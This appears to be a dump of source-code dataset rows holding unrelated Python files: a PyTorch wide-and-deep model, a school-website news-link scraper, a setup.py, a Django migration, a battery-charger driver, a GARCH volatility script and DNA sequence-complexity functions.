hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2b8f31f3a6c54f4ea76713cf603b83eb2e6cd549 | 5,945 | py | Python | pytorch_wide_n_deep/usingpytorch.py | whatbeg/Data-Analysis | b1f878564448527ca730f6d869dc3cb0d9b678d7 | [
"Apache-2.0"
] | 1 | 2019-01-23T05:02:22.000Z | 2019-01-23T05:02:22.000Z | pytorch_wide_n_deep/usingpytorch.py | whatbeg/Data-Analysis | b1f878564448527ca730f6d869dc3cb0d9b678d7 | [
"Apache-2.0"
] | null | null | null | pytorch_wide_n_deep/usingpytorch.py | whatbeg/Data-Analysis | b1f878564448527ca730f6d869dc3cb0d9b678d7 | [
"Apache-2.0"
] | 3 | 2015-05-11T07:11:05.000Z | 2016-01-22T14:08:38.000Z | from __future__ import print_function
import numpy as np
import dataprocessing as proc
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
# Training settings.
# BUG FIX: several help strings stated defaults that contradicted the actual
# default= values (64 vs 256, 20 vs 40, 0.01 vs 0.001); the text now matches.
parser = argparse.ArgumentParser(description='BASE Model')
parser.add_argument('--batch-size', type=int, default=256, metavar='N',
                    help='input batch size for training (default: 256)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
                    help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=40, metavar='N',
                    help='number of epochs to train (default: 40)')
parser.add_argument('--lr', type=float, default=0.001, metavar='LR',
                    help='learning rate (default: 0.001)')
parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
                    help='SGD momentum (default: 0.5)')
parser.add_argument('--no-cuda', action='store_true', default=False,
                    help='disables CUDA training')
parser.add_argument('--seed', type=int, default=0, metavar='S',
                    help='random seed (default: 0)')
parser.add_argument('--log-interval', type=int, default=40, metavar='N',
                    help='how many batches to wait before logging training status')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
# Seed both CPU and (if available) GPU RNGs for reproducibility.
torch.manual_seed(args.seed)
if args.cuda:
    torch.cuda.manual_seed(args.seed)
class Net(nn.Module):
    """Wide & Deep classifier for a 21-column integer-encoded tabular input.

    Input: LongTensor of shape (batch, 21).
      * columns 0-6   -> "wide" part, used directly as float features
      * columns 10-15 -> categorical ids fed through six embeddings (8-d each)
      * columns 16-20 -> continuous features appended to the deep part
    Output: log-probabilities over 2 classes, shape (batch, 2).
    NOTE(review): columns 7-9 are never read -- presumably intentional;
    confirm against dataprocessing.py.
    """
    def __init__(self):
        super(Net, self).__init__()
        # nn.Embedding(num_embeddings, embedding_dim, padding_idx)
        self.emb1 = nn.Embedding(9, 8, 0)
        self.emb2 = nn.Embedding(16, 8, 0)
        self.emb3 = nn.Embedding(2, 8, 0)
        self.emb4 = nn.Embedding(6, 8, 0)
        self.emb5 = nn.Embedding(42, 8, 0)
        self.emb6 = nn.Embedding(15, 8, 0)
        # deep input: 6 embeddings * 8 dims + 5 continuous columns = 53
        self.linear1 = nn.Linear(53, 100)
        self.linear2 = nn.Linear(100, 50)
        # final input: 50 deep features + 7 wide columns = 57
        self.linear3 = nn.Linear(57, 2)
    def forward(self, x):
        # BUG FIX: the original re-wrapped torch.cat(... .data ...) in
        # Variable(), which detaches the autograd graph -- the embeddings and
        # linear1/linear2 never received gradients.  Tensors are now
        # concatenated directly so gradients flow through the whole network.
        wide_indices = torch.LongTensor([0, 1, 2, 3, 4, 5, 6])
        deep_indices = torch.LongTensor([16, 17, 18, 19, 20])
        wide = torch.index_select(x, 1, wide_indices).float()
        deep_parts = [
            self.emb1(x.select(1, 10)),
            self.emb2(x.select(1, 11)),
            self.emb3(x.select(1, 12)),
            self.emb4(x.select(1, 13)),
            self.emb5(x.select(1, 14)),
            self.emb6(x.select(1, 15)),
            torch.index_select(x, 1, deep_indices).float(),
        ]
        deep = torch.cat(deep_parts, 1)
        deep = F.relu(self.linear1(deep))
        deep = F.relu(self.linear2(deep))
        out = self.linear3(torch.cat([wide, deep], 1))
        # dim=1 made explicit (was the implicit default for 2-D input).
        return F.log_softmax(out, dim=1)
model = Net()
if args.cuda:
model.cuda()
# optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
def generate_data(data, label, batchSize, data_type='train', shuffle=True):
    """Yield (data, label) mini-batches from parallel numpy arrays.

    The final batch may be smaller than batchSize.  When shuffle is True the
    rows are permuted (jointly for data and label) before batching.
    `data_type` is kept for interface compatibility; train and test batches
    are produced identically.
    """
    assert batchSize > 0
    data_len = data.shape[0]
    # BUG FIX: use integer division -- under Python 3 `/` yields a float and
    # range(total_batch) raised TypeError.
    total_batch = data_len // batchSize + (1 if data_len % batchSize != 0 else 0)
    if shuffle:
        indices = np.random.permutation(data_len)
        data = data[indices]
        label = label[indices]
    for idx in range(total_batch):
        start = idx * batchSize
        end = min((idx + 1) * batchSize, data_len)
        # The original duplicated this yield in both branches of an
        # if data_type == 'train' test; the branches were identical.
        yield data[start:end], label[start:end]
def train(epoch, train_data, train_labels, use_data_len=32561):
    """Run one training epoch over the first `use_data_len` samples.

    Uses the module-level `model`, `optimizer` and `args`.  Logs the running
    NLL loss every `args.log_interval` batches.
    """
    model.train()  # set to training mode
    batch_idx = 1
    for (_data, _target) in generate_data(train_data[:use_data_len], train_labels[:use_data_len], batchSize=args.batch_size, shuffle=True):
        data = torch.from_numpy(_data)
        target = torch.from_numpy(_target).long()
        if args.cuda:
            data, target = data.cuda(), target.cuda()
        data, target = Variable(data), Variable(target)
        optimizer.zero_grad()
        output = model(data)  # call the module, not .forward(), so hooks run
        loss = F.nll_loss(output, target)
        loss.backward()
        optimizer.step()
        if batch_idx % args.log_interval == 0:
            # BUG FIX: loss.data[0] raises on PyTorch >= 0.5; use .item().
            print('Train Epoch: {} [Iteration {}] [{:5d}/{} ({:2d}%)]\tLoss: {:.6f}'.format(
                epoch, batch_idx, batch_idx * len(data), use_data_len,
                int(100. * batch_idx * len(data) / use_data_len), loss.item()))
        batch_idx += 1
def test(epoch, test_data, test_labels):
    """Evaluate the module-level `model` on the test split and print metrics."""
    model.eval()  # set to evaluation mode
    test_loss = 0
    correct = 0
    for (data, target) in generate_data(test_data, test_labels,
                                        batchSize=args.batch_size, shuffle=True):
        data = torch.from_numpy(data)
        target = torch.from_numpy(target).long()
        if args.cuda:
            data, target = data.cuda(), target.cuda()
        # NOTE(review): volatile=True is a no-op on modern PyTorch; a
        # torch.no_grad() block is the current equivalent.
        data, target = Variable(data, volatile=True), Variable(target)
        output = model(data)
        # BUG FIX: .data[0] raises on PyTorch >= 0.5; use .item() so the
        # accumulators are plain Python numbers, not tensors.
        test_loss += F.nll_loss(output, target).item()
        pred = output.data.max(1)[1]  # index of the max log-probability
        correct += pred.eq(target.data).cpu().sum().item()
    # nll_loss already averages over the batch, so divide by batch count
    # implicitly via dataset size (kept from the original implementation).
    test_loss /= test_data.shape[0]
    print('\nEpoch {} Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.1f}%)\n'.format(
        epoch, test_loss, correct, test_data.shape[0], 100. * correct / test_data.shape[0]))
def go():
    """Load the train/test splits via dataprocessing and run the full loop."""
    train_data, train_labels = proc.get_data("train")
    test_data, test_labels = proc.get_data("test")
    for epoch in range(1, args.epochs + 1):
        # 32561 -- presumably the full training-set size (Adult/census-style
        # dataset); TODO confirm against dataprocessing.get_data.
        train(epoch, train_data, train_labels, 32561)
        test(epoch, test_data, test_labels)
if __name__ == '__main__':
    go()
| 41 | 139 | 0.621699 | 1,308 | 0.220017 | 605 | 0.101766 | 0 | 0 | 0 | 0 | 850 | 0.142977 |
2b90c3926774337c71effdf292464f2dc4a520d0 | 1,152 | py | Python | test1.py | penghangph/python | 2a45e6ff8935a60731447ed3489ee410e9422f12 | [
"Apache-2.0"
] | null | null | null | test1.py | penghangph/python | 2a45e6ff8935a60731447ed3489ee410e9422f12 | [
"Apache-2.0"
] | null | null | null | test1.py | penghangph/python | 2a45e6ff8935a60731447ed3489ee410e9422f12 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# 爬虫抓学校官网首页
import requests
import re
import urllib.request
from bs4 import BeautifulSoup
import os
import lxml
# 保存文件
def file_save(data, path):
    """Write `data` (a str) to `path` as UTF-8 bytes, creating the parent
    directory if it does not exist.  Prints a success/failure message."""
    parent = os.path.split(path)[0]
    if not os.path.exists(parent):
        os.makedirs(parent)
    try:
        encoded = data.encode('utf-8')
        with open(path, 'wb') as f:
            f.write(encoded)
        print('保存完毕')
    except Exception as ex:
        print('保存失败', ex)
def url_open(url):
    """GET `url` pretending to be a desktop Chrome browser; return body text."""
    # 伪造头部信息 (spoof browser request headers)
    headers = {
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6',
        'Cache-Control': 'max-age=0',
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
    }
    # BUG FIX: headers must be passed via the `headers=` keyword; the original
    # `requests.get(url, headers)` bound the dict to the second positional
    # parameter (params), sending the headers as query-string arguments.
    r = requests.get(url, headers=headers)
    _data = r.text
    return _data
url = "http://www.yvtc.edu.cn"
data = url_open(url)
soup = BeautifulSoup(data, "lxml")
# Select all anchors whose href starts with /news/show (news article links).
tag = soup.select('a[href^="/news/show"]')
s = ""
# Build one "href,title" line per link, then save the whole list to disk.
for item in tag:
    s += item.get("href") + "," + item.get("title") + "\n"
print(s)
file_save(s, r"d:\1.txt")
2b90fc8674ef1dbf04e090bf10431e1e1fe2bc12 | 1,464 | py | Python | setup.py | JimCircadian/model-ensembler | 68dc0cb80a2837209f51319fbbf29f62b49d19ed | [
"MIT"
] | 4 | 2021-02-19T13:05:59.000Z | 2021-12-13T12:40:55.000Z | setup.py | JimCircadian/model-ensembler | 68dc0cb80a2837209f51319fbbf29f62b49d19ed | [
"MIT"
] | 27 | 2021-06-24T11:06:18.000Z | 2022-03-31T20:26:51.000Z | setup.py | JimCircadian/model-ensembler | 68dc0cb80a2837209f51319fbbf29f62b49d19ed | [
"MIT"
] | null | null | null | import setuptools
from setuptools import setup
"""Setup module for model_ensembler
"""
# The PyPI long description is taken verbatim from the README.
with open("README.md", "r") as fh:
    long_description = fh.read()
setup(
    name="model-ensembler",
    version="0.5.2",
    author="James Byrne",
    author_email="jambyr@bas.ac.uk",
    description="Model Ensemble for batch workflows on HPCs",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://www.github.com/jimcircadian/model-ensembler",
    project_urls={
        "Bug Tracker": "https://github.com/jimcircadian/model-ensembler/issues",
    },
    packages=setuptools.find_packages(),
    keywords='slurm, hpc, tools, batch, model, ensemble',
    classifiers=[
        "Environment :: Console",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Intended Audience :: Science/Research",
        "Intended Audience :: System Administrators",
        "License :: OSI Approved :: MIT License",
        "Operating System :: POSIX",
        "Development Status :: 3 - Alpha",
        "Topic :: System :: Distributed Computing",
    ],
    # Installs the `model_ensemble` console command.
    entry_points={
        'console_scripts': [
            'model_ensemble=model_ensembler.cli:main',
        ],
    },
    python_requires='>=3.7, <4',
    install_requires=[
        "jinja2",
        "jsonschema",
        "pyyaml",
    ],
    include_package_data=True,
)
| 28.705882 | 80 | 0.622951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 794 | 0.54235 |
2b91b64bcf9fb63e83545e349af03a180f049619 | 3,012 | py | Python | fun/fnotification/migrations/0001_initial.py | larryw3i/osp | d9526a179876053a6b93e5a110d2de730376f511 | [
"MIT"
] | 1 | 2022-01-01T11:14:58.000Z | 2022-01-01T11:14:58.000Z | fun/fnotification/migrations/0001_initial.py | larryw3i/osp | d9526a179876053a6b93e5a110d2de730376f511 | [
"MIT"
] | null | null | null | fun/fnotification/migrations/0001_initial.py | larryw3i/osp | d9526a179876053a6b93e5a110d2de730376f511 | [
"MIT"
] | null | null | null | # Generated by Django 4.0 on 2022-01-13 10:17
import uuid
import ckeditor_uploader.fields
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration for the fnotification app: creates Fnotification."""

    initial = True

    dependencies = [
        ('funuser', '0004_alter_funuser_avatar'),
        ('auth', '0012_alter_user_first_name_max_length'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Fnotification',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, unique=True)),
                ('title', models.CharField(max_length=64, verbose_name='Title')),
                ('content', ckeditor_uploader.fields.RichTextUploadingField(max_length=2048, verbose_name='Content')),
                ('additional_files', models.FileField(help_text='If you have more than one file, please package them and upload them.', upload_to='', verbose_name='Additional files')),
                ('DOC', models.DateTimeField(auto_now_add=True, verbose_name='Date of creating')),
                ('DOU', models.DateTimeField(auto_now=True, verbose_name='Date of updating')),
                ('comment', models.TextField(max_length=128, verbose_name='Comment')),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this notification belongs to. all user of specific groups will receive notification. for all users if groups is null', related_name='notification_set', related_query_name='notification', to='auth.Group', verbose_name='groups')),
                ('poster', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='funuser.funuser', verbose_name='Author')),
                ('readers', models.ManyToManyField(blank=True, related_name='reader_set', related_query_name='reader', to=settings.AUTH_USER_MODEL, verbose_name='Reader')),
            ],
            options={
                'verbose_name': 'Notification',
                'verbose_name_plural': 'Notifications',
            },
        ),
    ]
| 35.857143 | 161 | 0.479748 | 2,810 | 0.932935 | 0 | 0 | 0 | 0 | 0 | 0 | 672 | 0.223108 |
2b9247e4df10a952e35c2f7d168d1b670abd566a | 3,919 | py | Python | flight_computer/lib/bq25883.py | stanford-ssi/sequoia-software | 63b023e229c65f2a12e365366442fab3b196817f | [
"MIT"
] | 4 | 2020-09-16T02:19:34.000Z | 2021-02-07T03:10:50.000Z | flight_computer/lib/bq25883.py | stanford-ssi/sequoia-software | 63b023e229c65f2a12e365366442fab3b196817f | [
"MIT"
] | 33 | 2020-09-24T06:52:37.000Z | 2021-02-25T03:29:51.000Z | flight_computer/lib/bq25883.py | stanford-ssi/sequoia-software | 63b023e229c65f2a12e365366442fab3b196817f | [
"MIT"
] | 2 | 2021-02-07T03:10:53.000Z | 2022-01-07T06:06:15.000Z | """
`bq25883`
====================================================
CircuitPython driver for the BQ25883 2-cell USB boost-mode charger.
* Author(s): Max Holliday
Implementation Notes
--------------------
"""
from micropython import const
from adafruit_bus_device.i2c_device import I2CDevice
from adafruit_register.i2c_struct import ROUnaryStruct, UnaryStruct
from adafruit_register.i2c_bits import ROBits, RWBits
from adafruit_register.i2c_bit import ROBit, RWBit
# Registers
_BATV_LIM = const(0x00)
_CHRGI_LIM = const(0x01)
_VIN_LIM = const(0x02)
_IIN_LIM = const(0x03)
_TERM_CTRL = const(0x04)
_CHRGR_CRTL1 = const(0x05)
_CHRGR_CRTL2 = const(0x06)
_CHRGR_CRTL3 = const(0x07)
_CHRGR_CRTL4 = const(0x08)
_OTG_CTRL = const(0x09)
_ICO_LIM = const(0x0A)
_CHRG_STAT1 = const(0x0B)
_CHRG_STAT2 = const(0x0C)
_NTC_STAT = const(0x0D)
_FAULT_STAT = const(0x0E)
_CHRGR_FLAG1 = const(0x0F)
_CHRGR_FLAG2 = const(0x10)
_FAULT_FLAG = const(0x11)
_CHRGR_MSK1 = const(0x12)
_CHRGR_MSK2 = const(0x13)
_FAULT_MSK = const(0x14)
_ADC_CTRL = const(0x15)
_ADC_FN_CTRL = const(0x16)
_IBUS_ADC1 = const(0x17)
_IBUS_ADC0 = const(0x18)
_ICHG_ADC1 = const(0x19)
_ICHG_ADC0 = const(0x1A)
_VBUS_ADC1 = const(0x1B)
_VBUS_ADC0 = const(0x1C)
_VBAT_ADC1 = const(0x1D)
_VBAT_ADC0 = const(0x1E)
_VSYS_ADC1 = const(0x1F)
_VSYS_ADC0 = const(0x20)
_TS_ADC1 = const(0x21)
_TS_ADC0 = const(0x22)
_TDIE_ADC1 = const(0x23)
_TDIE_ADC0 = const(0x24)
_PART_INFO = const(0x25)
def _to_signed(num):
    """Reinterpret an unsigned 16-bit register value as two's-complement."""
    return num - 0x10000 if num > 0x7FFF else num
class BQ25883:
    """Register-level driver for the TI BQ25883 2-cell boost-mode charger.

    Each class attribute maps a named field onto bits of an I2C register --
    arguments follow the adafruit_register convention (field width in bits
    for ROBits/RWBits, register address, lowest bit, register byte width,
    signedness/LSB-first flag).
    """
    # --- read-only status/info fields ---
    _pn = ROBits(4,_PART_INFO,3,1,False)  # part number; 3 identifies BQ25883
    _fault_status = ROBits(8,_FAULT_STAT,0,1,False)
    _chrgr_status1 = ROBits(8,_CHRG_STAT1,0,1,False)
    _chrgr_status2 = ROBits(8,_CHRG_STAT2,0,1,False)
    _chrg_status = ROBits(3,_CHRG_STAT1,0,1,False)  # low 3 bits of STAT1
    _otg_ctrl = ROBits(8,_OTG_CTRL,0,1,False)
    _chrg_ctrl2 = ROBits(8,_CHRGR_CRTL2,0,1,False)
    # --- read/write control fields ---
    _wdt = RWBits(2,_CHRGR_CRTL1,4,1,False)  # watchdog timer setting (0 = off)
    _ntc_stat = RWBits(3,_NTC_STAT,0,1,False)
    _pfm_dis = RWBit(_CHRGR_CRTL3,7,1,False)
    _en_chrg = RWBit(_CHRGR_CRTL2, 3, 1, False)  # charge enable bit
    _reg_rst = RWBit(_PART_INFO, 7, 1, False)  # register reset bit
    _stat_dis = RWBit(_CHRGR_CRTL1, 6, 1, False)  # STAT LED disable bit
    _inlim = RWBit(_CHRGI_LIM, 6, 1, False)
    def __init__(self, i2c_bus, addr=0x6B):
        # 0x6B is the device's fixed 7-bit I2C address.
        self.i2c_device = I2CDevice(i2c_bus, addr)
        self.i2c_addr = addr
        assert self._pn == 3, "Unable to find BQ25883"
    @property
    def status(self):
        """Print a human-readable dump of the status registers (returns None)."""
        print('Fault:',bin(self._fault_status))
        print('Charger Status 1:',bin(self._chrgr_status1))
        print('Charger Status 2:',bin(self._chrgr_status2))
        print('Charge Status:',bin(self._chrg_status))
        print('Charge Control2:',bin(self._chrg_ctrl2))
        print('NTC Status:',bin(self._ntc_stat))
        print('OTG:',hex(self._otg_ctrl))
    @property
    def charging(self):
        # NOTE(review): the getter prints rather than returning the bit --
        # callers cannot read the state programmatically; confirm intent.
        print('Charge Control2:',bin(self._chrg_ctrl2))
    @charging.setter
    def charging(self,value):
        # Enable/disable battery charging.
        assert type(value) == bool
        self._en_chrg=value
    @property
    def wdt(self):
        print('Watchdog Timer:',bin(self._wdt))
    @wdt.setter
    def wdt(self,value):
        # Falsy value disables the watchdog (register value 0).
        if not value:
            self._wdt=0
        else:
            self._wdt=value
    @property
    def led(self):
        print('Status LED:',bin(self._stat_dis))
    @led.setter
    def led(self,value):
        # True enables the LED, i.e. clears the "disable" bit (inverted).
        assert type(value) == bool
        self._stat_dis=not value
2b92b611127a05b1d87d98fdcdf787a237a82dc6 | 129 | py | Python | faced/const.py | hseguro/faced | 4ad42c54fb8e8679fb5feda30af5db3ac74ccc8c | [
"MIT"
] | 575 | 2018-08-27T18:30:53.000Z | 2022-03-31T03:25:36.000Z | faced/const.py | 18718615232/faced | 31ef0d30e1567a06113f49ff4a1202760d952df2 | [
"MIT"
] | 35 | 2018-09-04T08:16:59.000Z | 2022-02-03T18:28:29.000Z | faced/const.py | 18718615232/faced | 31ef0d30e1567a06113f49ff4a1202760d952df2 | [
"MIT"
] | 172 | 2018-08-31T16:55:50.000Z | 2022-02-28T12:03:58.000Z | import os
MODELS_PATH = os.path.join(os.path.dirname(__file__), "models")
YOLO_SIZE = 288
YOLO_TARGET = 9
CORRECTOR_SIZE = 50
| 14.333333 | 63 | 0.744186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 | 0.062016 |
2b94150c3b79e3074d21274247ea053c2cb884e0 | 178 | py | Python | scripts/core/pass_types.py | evolving-dev/holo | d8ef8dd58302d9f2589e5d2b3011015ff145528d | [
"MIT"
] | null | null | null | scripts/core/pass_types.py | evolving-dev/holo | d8ef8dd58302d9f2589e5d2b3011015ff145528d | [
"MIT"
] | null | null | null | scripts/core/pass_types.py | evolving-dev/holo | d8ef8dd58302d9f2589e5d2b3011015ff145528d | [
"MIT"
] | null | null | null | class HoloResponse:
def __init__(self, success, response=None):
self.success = success
if response != None:
self.response = response
| 17.8 | 48 | 0.578652 | 176 | 0.988764 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
2b946538ca5653fc5a315cf1136426e8c8360806 | 1,418 | py | Python | volatility/models.py | larrys54321/quant_corner | 3dc6f3f3d1ce1fa002c226bd5c5f845b91710687 | [
"MIT"
] | null | null | null | volatility/models.py | larrys54321/quant_corner | 3dc6f3f3d1ce1fa002c226bd5c5f845b91710687 | [
"MIT"
] | null | null | null | volatility/models.py | larrys54321/quant_corner | 3dc6f3f3d1ce1fa002c226bd5c5f845b91710687 | [
"MIT"
] | null | null | null | import yfinance as yf
from datetime import datetime
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from arch import arch_model
from volatility.utils import get_percent_chg
# Analysis window: ~two decades of daily SPY data from Yahoo Finance.
start = datetime(2000, 1, 1)
end = datetime(2020, 9, 11)
symbol = 'SPY'
tickerData = yf.Ticker(symbol)
df = tickerData.history(period='1d', start=start, end=end)
# get_percent_chg presumably adds the ret_<n> percent-change columns that the
# keyList below reads -- see volatility.utils.
get_percent_chg(df, 1)
get_percent_chg(df, 5)
get_percent_chg(df, 10)
get_percent_chg(df, 15)
get_percent_chg(df, 21)
returns = df.Close.pct_change().dropna()
df['ret_1a'] = returns
test_size = 365*5
# NOTE(review): the next line overrides the 5-year window above, making the
# 365*5 assignment dead code -- confirm which horizon is intended.
test_size = 365
keyList = ['ret_1', 'ret_5', 'ret_10', 'ret_15', 'ret_21']
fig, ax = plt.subplots(figsize=(10, 5), nrows=5, ncols=1)
k = 0
# Walk-forward GARCH(2,2): for each horizon, refit on all data before each
# of the last `test_size` days and predict the next day's volatility.
for key in keyList:
    returns = 100 * df[key].dropna()
    predictions = []
    print('key', key)
    for i in range(test_size):
        train = returns[:-(test_size-i)]
        model = arch_model(train, p=2, q=2)
        model_fit = model.fit(disp='off')
        pred_val = model_fit.forecast(horizon=1)
        predictions.append(np.sqrt(pred_val.variance.values[-1,:][0]))
    predictions = pd.Series(predictions, index=returns.index[-test_size:])
    ax[k].plot(returns[-test_size:], label=key, color='r')
    ax[k].plot(predictions, label=key+' volpred', color='b')
    ax[k].set_ylabel(key)
    k += 1
ax[k-1].set_xlabel('Date')
plt.legend(['True Returns', 'Predicted Volatility'], loc=2, fontsize=8)
plt.show()
2b95c55be0557da724a633f006455d098498c600 | 5,880 | py | Python | Bio/SeqUtils/lcc.py | barendt/biopython | 391bcdbee7f821bff3e12b75c635a06bc1b2dcea | [
"PostgreSQL"
] | 1 | 2016-05-09T13:17:59.000Z | 2016-05-09T13:17:59.000Z | Bio/SeqUtils/lcc.py | cymon/biopython-github-master | 7be9697599296401b0a7126d23b5eda391a94116 | [
"PostgreSQL"
] | null | null | null | Bio/SeqUtils/lcc.py | cymon/biopython-github-master | 7be9697599296401b0a7126d23b5eda391a94116 | [
"PostgreSQL"
] | null | null | null | # Copyright 2003, 2007 by Sebastian Bassi. sbassi@genesdigitales.com
# All rights reserved. This code is part of the Biopython
# distribution and governed by its license.
# Please see the LICENSE file that should have been included as part
# of this package.
import math
def lcc_mult(seq, wsize):
    """Local Composition Complexity (LCC) values over a sliding window.

    seq - an unambiguous DNA sequence (a string or Seq object)
    wsize - window size, integer

    Returns a list of floats: a leading 0 (kept for backward compatibility
    with the original implementation) followed by one LCC value per window
    position.  The result equals applying lcc_simp to every window, but is
    computed incrementally: each shift removes the outgoing base and adds
    the incoming one, so only the affected composition terms change.
    """
    # BUG FIX: the original counted the first window on the raw (possibly
    # lower-case) sequence and compared the outgoing base against it, which
    # silently produced wrong values for lower-case input; everything now
    # operates on one upper-cased copy.  str() also replaces the removed
    # Seq.tostring() method.
    upper = str(seq).upper()
    l2 = math.log(2)
    # compone[i] = (i/w) * log2(i/w); compone[0] = 0 so absent bases
    # contribute nothing (and log(0) is never taken).
    compone = [0.0]
    for i in range(1, wsize + 1):
        fraction = i / float(wsize)
        compone.append(fraction * math.log(fraction) / l2)
    counts = {base: upper[:wsize].count(base) for base in 'ACGT'}
    lccsal = [0]
    lccsal.append(-sum(compone[counts[base]] for base in 'ACGT'))
    for start in range(len(upper) - wsize):
        outgoing = upper[start]
        incoming = upper[start + wsize]
        if incoming == outgoing:
            # Composition unchanged -- reuse the previous value.
            lccsal.append(lccsal[-1])
            continue
        # Non-ACGT characters are ignored, matching the original behaviour.
        if outgoing in counts:
            counts[outgoing] -= 1
        if incoming in counts:
            counts[incoming] += 1
        lccsal.append(-sum(compone[counts[base]] for base in 'ACGT'))
    return lccsal
def lcc_simp(seq):
    """Local Composition Complexity (LCC) for a sequence.

    seq - an unambiguous DNA sequence (a string or Seq object)

    Returns the Local Composition Complexity (LCC) value for the entire
    sequence (as a float).

    Reference:
    Andrzej K Konopka (2005) Sequence Complexity and Composition
    DOI: 10.1038/npg.els.0005260
    """
    # str() replaces the removed Seq.tostring() method and works for plain
    # strings as well; the original's four copy-pasted per-base branches are
    # collapsed into one loop.
    upper = str(seq).upper()
    wsize = len(seq)
    l2 = math.log(2)
    total = 0.0
    for base in 'ACGT':
        count = upper.count(base)
        # Skip absent bases: they contribute nothing and log(0) is undefined.
        if count:
            fraction = count / float(wsize)
            total += fraction * math.log(fraction) / l2
    return -total
| 36.07362 | 78 | 0.541667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,298 | 0.220748 |
2b96e0991964b2437d682f1fd12e74f747085a34 | 302 | py | Python | skippa/__init__.py | data-science-lab-amsterdam/skippa | 1349317c441f1e46e22f4c02a8aceae767aea5fe | [
"BSD-3-Clause"
] | 33 | 2021-12-15T22:56:12.000Z | 2022-02-26T12:33:56.000Z | skippa/__init__.py | data-science-lab-amsterdam/skippa | 1349317c441f1e46e22f4c02a8aceae767aea5fe | [
"BSD-3-Clause"
] | null | null | null | skippa/__init__.py | data-science-lab-amsterdam/skippa | 1349317c441f1e46e22f4c02a8aceae767aea5fe | [
"BSD-3-Clause"
] | 1 | 2022-01-20T15:41:35.000Z | 2022-01-20T15:41:35.000Z | """Top-level package for skippa.
The pipeline module defines the main Skippa methods
The transformers subpackage contains various transformers used in the pipeline.
"""
__author__ = """Robert van Straalen"""
__email__ = 'tech@datasciencelab.nl'
from .pipeline import Skippa, SkippaPipeline, columns
| 27.454545 | 79 | 0.788079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 218 | 0.721854 |
2b9799f7570f968fd082853bb9689a42c333baf1 | 115 | py | Python | mini-scripts/Python_Casting_(float).txt.py | Web-Dev-Collaborative/PYTHON_PRAC | 856f902fb43dcccae168d34ee6aacc02427a7ac6 | [
"MIT"
] | 5 | 2021-06-02T23:44:25.000Z | 2021-12-27T16:21:57.000Z | mini-scripts/Python_Casting_(float).txt.py | Web-Dev-Collaborative/PYTHON_PRAC | 856f902fb43dcccae168d34ee6aacc02427a7ac6 | [
"MIT"
] | 22 | 2021-05-31T01:33:25.000Z | 2021-10-18T18:32:39.000Z | mini-scripts/Python_Casting_(float).txt.py | Web-Dev-Collaborative/PYTHON_PRAC | 856f902fb43dcccae168d34ee6aacc02427a7ac6 | [
"MIT"
] | 3 | 2021-06-19T03:37:47.000Z | 2021-08-31T00:49:51.000Z | x = float(1)
y = float(2.8)
z = float("3")
w = float("4.2")
print(x)
print(y)
print(z)
print(w)
# Author: Bryan G
| 11.5 | 18 | 0.573913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 26 | 0.226087 |
